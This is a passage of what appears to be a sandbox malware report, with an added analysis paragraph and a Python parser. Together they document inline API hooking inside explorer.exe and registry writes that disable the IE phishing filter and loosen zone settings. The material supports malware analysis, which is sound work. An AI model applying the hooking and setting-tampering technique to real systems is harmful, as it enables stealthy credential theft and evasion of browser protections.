1636 C:\WINDOWS\explorer.exe 1810028 10 8B FF 55 8B EC E9 5C EE 14 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D95EE89 5 E9 20 52 62 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810032 10 8B FF 55 8B EC E9 88 A6 1A 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D9BA6BF 5 E9 3E 9A 5C C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181003C 10 8B FF 55 8B EC E9 25 A6 1A 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D9BA666 5 E9 33 9B 5C C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810046 10 8B FF 55 8B EC E9 3D 90 13 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D949088 5 E9 AD B1 63 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810050 10 8B FF 55 8B EC E9 F6 64 13 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D94654B 5 E9 2D DD 63 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181005A 10 8B FF 55 8B EC E9 22 33 15 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D963381 5 E9 36 0F 62 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810064 10 8B FF 55 8B EC E9 1A BF 13 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D94BF83 5 E9 7E 83 63 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181006E 10 8B FF 55 8B EC E9 1A 87 13 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D94878D 5 E9 A0 BB 63 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810078 10 8B FF 55 8B EC E9 AE 3D 2A 70 success or wait 1 1F8A569
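Read together, the "Memory read" and "Memory written" tables are a record of inline API hooking inside explorer.exe (PID 1636). For each API the sample first reads 30 bytes of the prologue (source 1F8A4F3), writes a 10-byte trampoline into its own RWX region at 1810000 (the allocation with "page execute and read and write" below; source 1F8A569) consisting of the first 5 original bytes followed by an E9 jump back to API+5, and then overwrites the API prologue with a 5-byte E9 jump (source 1F8A591). The "Memory attributes changed" table shows the matching VirtualProtect dance: 1F8A4CC flips the page to execute-read-write, 1F8A5AD restores execute-read afterwards. The prologue at 7C90D1AE is an XP-style system-call stub (mov eax, 35h; mov edx, 7FFE0300h; call [edx]), so that hook sits on an Nt* entry point, while most of the others begin with the hot-patchable 8B FF 55 8B EC prologue. Decoding the rel32 displacements puts every hook target in the 1F7xxxx-1F8xxxx range, which is exactly the range of the Source Address column in this report, i.e. the injected code. The script below is an added example, not part of the Joebox report or of the sample: it parses a subset of the rows copied from the two tables, reconstructs each hook (API, target, trampoline, stolen bytes), verifies that the stolen bytes equal the bytes originally read and that the trampoline resumes at API+5, and reports a trampoline whose jump row is absent from the excerpt (1810078, which resumes at 71AB3E30). The module names come from an assumed table of default Windows XP SP3 image bases, which the report excerpt does not state; confirm them against the report's own module list before relying on them.

```python
import re

# Rows copied from the report's "Memory read" and "Memory written" tables for
# explorer.exe (PID 1636); a subset, to keep the example short. The last trampoline
# (1810078) has no matching 5-byte jmp row in the excerpt, deliberately.
MEMORY_READ = r"""
1636 C:\WINDOWS\explorer.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 7C811195 30 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 3D94FABE 30 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1 1F8A4F3
1636 C:\WINDOWS\explorer.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 1F8A4F3
"""
MEMORY_WRITTEN = r"""
1636 C:\WINDOWS\explorer.exe 1810000 10 B8 35 00 00 00 E9 A9 D1 0F 7B success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C90D1AE 5 E9 33 B7 66 85 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181000A 10 68 6C 02 00 00 E9 1E 63 10 7B success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C91632D 5 E9 94 27 66 85 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810014 10 8B FF 55 8B EC E9 7C 11 00 7B success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C811195 5 E9 CE 79 76 85 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 181001E 10 8B FF 55 8B EC E9 9B FA 13 3C success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D94FABE 5 E9 97 45 63 C4 success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 1810078 10 8B FF 55 8B EC E9 AE 3D 2A 70 success or wait 1 1F8A569
"""
# Report row layout: PID, Filepath, Base, Length, Value (hex bytes), Completion, Count, Source.
ROW = re.compile(
    r"^(?P<pid>\d+)\s+(?P<path>.+?)\s+(?P<base>[0-9A-F]+)\s+(?P<length>\d+)\s+"
    r"(?P<value>(?:[0-9A-F]{2}\s+)+)(?P<status>[a-z][a-z ]*?)\s+(?P<count>\d+)\s+(?P<src>[0-9A-F]+)$"
)
# ASSUMED: default image base and approximate size of each DLL on an English Windows XP SP3
# guest. Not stated in the report excerpt; verify against the report's module list.
MODULES = {
    "ntdll.dll": (0x7C900000, 0xB0000),
    "kernel32.dll": (0x7C800000, 0x100000),
    "wininet.dll": (0x3D930000, 0xD1000),
    "ws2_32.dll": (0x71AB0000, 0x17000),
}
# Span covering the report's Source Address column for this process (0x1F7614F..0x1F8AED8),
# i.e. where the injected code runs; hook targets are expected to land inside it.
INJECTED = (0x01F70000, 0x01F90000)


def parse_rows(table):
    """Return [(address, bytes)] and check the Length column against the byte dump."""
    rows = []
    for line in table.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            raise ValueError("unparsed row: " + line)
        data = bytes.fromhex(m["value"].strip())
        if len(data) != int(m["length"]):
            raise ValueError("length column disagrees with byte dump: " + line)
        rows.append((int(m["base"], 16), data))
    return rows


def jmp_target(at, code):
    """Decode an E9 rel32 near jmp located at `at`; return its 32-bit target, or None."""
    if len(code) < 5 or code[0] != 0xE9:
        return None
    rel = int.from_bytes(code[1:5], "little", signed=True)
    return (at + 5 + rel) & 0xFFFFFFFF


def module_of(addr):
    for name, (base, size) in MODULES.items():
        if base <= addr < base + size:
            return name
    return "?"


def syscall_number(prologue):
    """XP-style Nt* stub: mov eax, N ; mov edx, 7FFE0300h ; call [edx]. Returns N or None."""
    if prologue[:1] == b"\xB8" and prologue[5:12] == b"\xBA\x00\x03\xFE\x7F\xFF\x12":
        return int.from_bytes(prologue[1:5], "little")
    return None


def reconstruct_hooks(reads, writes):
    """Pair each 5-byte jmp written over an API with the trampoline that resumes at API+5."""
    original = dict(reads)
    hooks, resumes = {}, {}
    for addr, data in writes:
        if len(data) == 5 and data[0] == 0xE9:          # jmp planted on the API prologue
            hooks[addr] = {"api": addr, "module": module_of(addr), "target": jmp_target(addr, data),
                           "syscall": syscall_number(original.get(addr, b""))}
        elif len(data) == 10 and data[5] == 0xE9:      # stolen bytes + jmp back
            resumes[jmp_target(addr + 5, data[5:])] = (addr, data[:5])
    complete, orphans = [], []
    for back, (tramp, stolen) in resumes.items():
        api = back - 5
        if api in hooks:
            h = hooks[api]
            h.update(trampoline=tramp, stolen=stolen,
                     stolen_matches_original=original.get(api, b"")[:5] == stolen,
                     target_in_injected_region=INJECTED[0] <= h["target"] < INJECTED[1])
            complete.append(h)
        else:  # trampoline seen, but its jmp row is missing from the excerpt
            orphans.append({"trampoline": tramp, "resumes_at": back, "stolen": stolen})
    return complete, orphans


if __name__ == "__main__":
    complete, orphans = reconstruct_hooks(parse_rows(MEMORY_READ), parse_rows(MEMORY_WRITTEN))
    for h in sorted(complete, key=lambda h: h["api"]):
        print("%-13s %08X -> %08X  trampoline %07X  stolen=%s ok=%s syscall=%s" % (
            h["module"], h["api"], h["target"], h["trampoline"], h["stolen"].hex(),
            h["stolen_matches_original"], h["syscall"]))
    for o in orphans:
        print("trampoline %07X resumes at %08X (%s) but no jmp row in excerpt" % (
            o["trampoline"], o["resumes_at"], module_of(o["resumes_at"])))
```

Feeding the complete tables through the same parser yields twelve paired hooks across ntdll, kernel32 and the 3D9xxxxx module, all with stolen bytes matching the original reads and all targets inside the injected region; a hook whose target falls outside that region, or whose stolen bytes differ from the bytes read, is the case worth a second look.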
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 2950000 294F6A8 page read and write success or wait 1 1F84961
1636 C:\WINDOWS\explorer.exe 2950000 294F6AC page read and write success or wait 1 1F84961
1636 C:\WINDOWS\explorer.exe 1810000 294F47C page execute and read and write success or wait 1 1F81A36
1636 C:\WINDOWS\explorer.exe 2B50000 294E9C8 page read and write success or wait 30 1F8AED8
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 1F8A4CC
1636 C:\WINDOWS\explorer.exe 1810000 1000 page execute and read and write page execute and read and write success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 1810000 1000 page execute and read and write page execute and read and write success or wait 52 1F8A569
1636 C:\WINDOWS\explorer.exe 7C90D1AE 1000 page execute and read and write page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C90D000 1000 page execute and write copy page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 1F8A5AD
1636 C:\WINDOWS\explorer.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 1F8A4CC
1636 C:\WINDOWS\explorer.exe 181000A 1000 page execute and read and write page execute and read and write success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C91632D 1000 page execute and read and write page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C916000 1000 page execute and write copy page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 1F8A5AD
1636 C:\WINDOWS\explorer.exe 7C811195 1000 page execute and read and write page execute read success or wait 1 1F8A4CC
1636 C:\WINDOWS\explorer.exe 1810014 1000 page execute and read and write page execute and read and write success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 7C811195 1000 page execute and read and write page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C811000 1000 page execute and write copy page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 7C811195 1000 page execute read page execute and read and write success or wait 1 1F8A5AD
1636 C:\WINDOWS\explorer.exe 3D94FABE 1000 page execute and read and write page execute read success or wait 1 1F8A4CC
1636 C:\WINDOWS\explorer.exe 181001E 1000 page execute and read and write page execute and read and write success or wait 1 1F8A569
1636 C:\WINDOWS\explorer.exe 3D94FABE 1000 page execute and read and write page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 3D94F000 1000 page execute and write copy page execute and write copy success or wait 1 1F8A591
1636 C:\WINDOWS\explorer.exe 3D94FABE 1000 page execute read page execute and read and write success or wait 1 1F8A5AD
1636 C:\WINDOWS\explorer.exe 3D95EE89 1000 page execute and read and write page execute read success or wait 1 1F8A4CC
1636 C:\WINDOWS\explorer.exe 1810028 1000 page execute and read and write page execute and read and write success or wait 1 1F8A569
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 23 1F872E5
CurrentTimeZoneInformation success or wait 3 1F85D9C
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Security success or wait 1 1F87391
+ Chronological sections
Operation Data Completion Time
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2950000 Length: 294F6A8 Allocation Type: null Protection: page read and write success or wait 1986859950
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2950000 Length: 294F6AC Allocation Type: null Protection: page read and write success or wait 1986860194
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 1986869838
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: Enabled object name not found 1986870593
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: EnabledV8 success or wait 1986871107
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: EnabledV8 Type: Dword Data: 0 success or wait 1986872392
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: CleanCookies Type: Dword Data: 0 success or wait 1986876122
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: 1406 success or wait 1986877541
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: 1609 success or wait 1986878065
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 Name: 1609 Type: Dword Data: 0 success or wait 1986879161
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 Name: 1406 success or wait 1986880441
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1406 Type: Dword Data: 0 success or wait 1986881525
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1609 success or wait 1986881980
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1609 Type: Dword Data: 0 success or wait 1986883162
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1406 success or wait 1986883636
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1406 Type: Dword Data: 0 success or wait 1986884880
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1609 success or wait 1986886282
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1609 Type: Dword Data: 0 success or wait 1986887531
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1406 success or wait 1986888002
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1406 Type: Dword Data: 0 success or wait 1986889065
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1609 success or wait 1986890278
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1609 Type: Dword Data: 0 success or wait 1986891357
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1406 success or wait 1986891824
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1406 Type: Dword Data: 0 success or wait 1986892897
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1609 success or wait 1986893348
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1609 Type: Dword Data: 0 success or wait 1986894427
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 294F47C Allocation Type: null Protection: page execute and read and write success or wait 1986895226
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1986896048
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1986896318
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986896596
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986896849
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 0F 7B success or wait 1986897140
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 1986897409
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 1986897673
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 5 Value: E9 33 B7 66 85 success or wait 1986897963
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 1986898244
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1986899042
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1986899303
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181000A Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986899643
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986899912
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 10 7B success or wait 1986900210
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 1986900447
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C916000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 1986900709
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 5 Value: E9 94 27 66 85 success or wait 1986900999
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 1986901277
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1986901932
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1986902192
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810014 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986902467
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986902730
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 00 7B success or wait 1986903025
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 1986903262
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 1986903524
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811195 Length: 5 Value: E9 CE 79 76 85 success or wait 1986903814
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C811195 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 1986904092
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1986905257
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1986905518
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181001E Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986905793
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986906055
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181001E Length: 10 Value: 8B FF 55 8B EC E9 9B FA 13 3C success or wait 1986906350
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 1986906585
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94F000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 1986906847
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 5 Value: E9 97 45 63 C4 success or wait 1986907136
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 1986907415
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D95EE89 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1986908509
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D95EE89 Length: 30 Value: 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1986908769
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810028 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986909042
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986909303
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810028 Length: 10 Value: 8B FF 55 8B EC E9 5C EE 14 3C success or wait 1986909597
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D95EE89 Length: 5 Value: E9 20 52 62 C4 success or wait 1986910384
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9BA6BF Length: 30 Value: 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1986911442
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986911974
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810032 Length: 10 Value: 8B FF 55 8B EC E9 88 A6 1A 3C success or wait 1986912270
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9BA6BF Length: 5 Value: E9 3E 9A 5C C4 success or wait 1986913057
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9BA666 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1986914112
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986914646
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181003C Length: 10 Value: 8B FF 55 8B EC E9 25 A6 1A 3C success or wait 1986914941
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9BA666 Length: 5 Value: E9 33 9B 5C C4 success or wait 1986915727
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D949088 Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1986917387
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986917921
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810046 Length: 10 Value: 8B FF 55 8B EC E9 3D 90 13 3C success or wait 1986918215
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D949088 Length: 5 Value: E9 AD B1 63 C4 success or wait 1986919087
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94654B Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1986921021
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986921557
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810050 Length: 10 Value: 8B FF 55 8B EC E9 F6 64 13 3C success or wait 1986921854
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94654B Length: 5 Value: E9 2D DD 63 C4 success or wait 1986922783
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D963381 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1986924406
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986924942
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 181005A Length: 10 Value: 8B FF 55 8B EC E9 22 33 15 3C success or wait 1986925238
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D963381 Length: 5 Value: E9 36 0F 62 C4 success or wait 1986926026
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94BF83 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1986937430
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986938588
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810064 Length: 10 Value: 8B FF 55 8B EC E9 1A BF 13 3C success or wait 1986956978
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94BF83 Length: 5 Value: E9 7E 83 63 C4 success or wait 1986958091
Memory read PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94878D Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1986959814
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1810000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1986960355
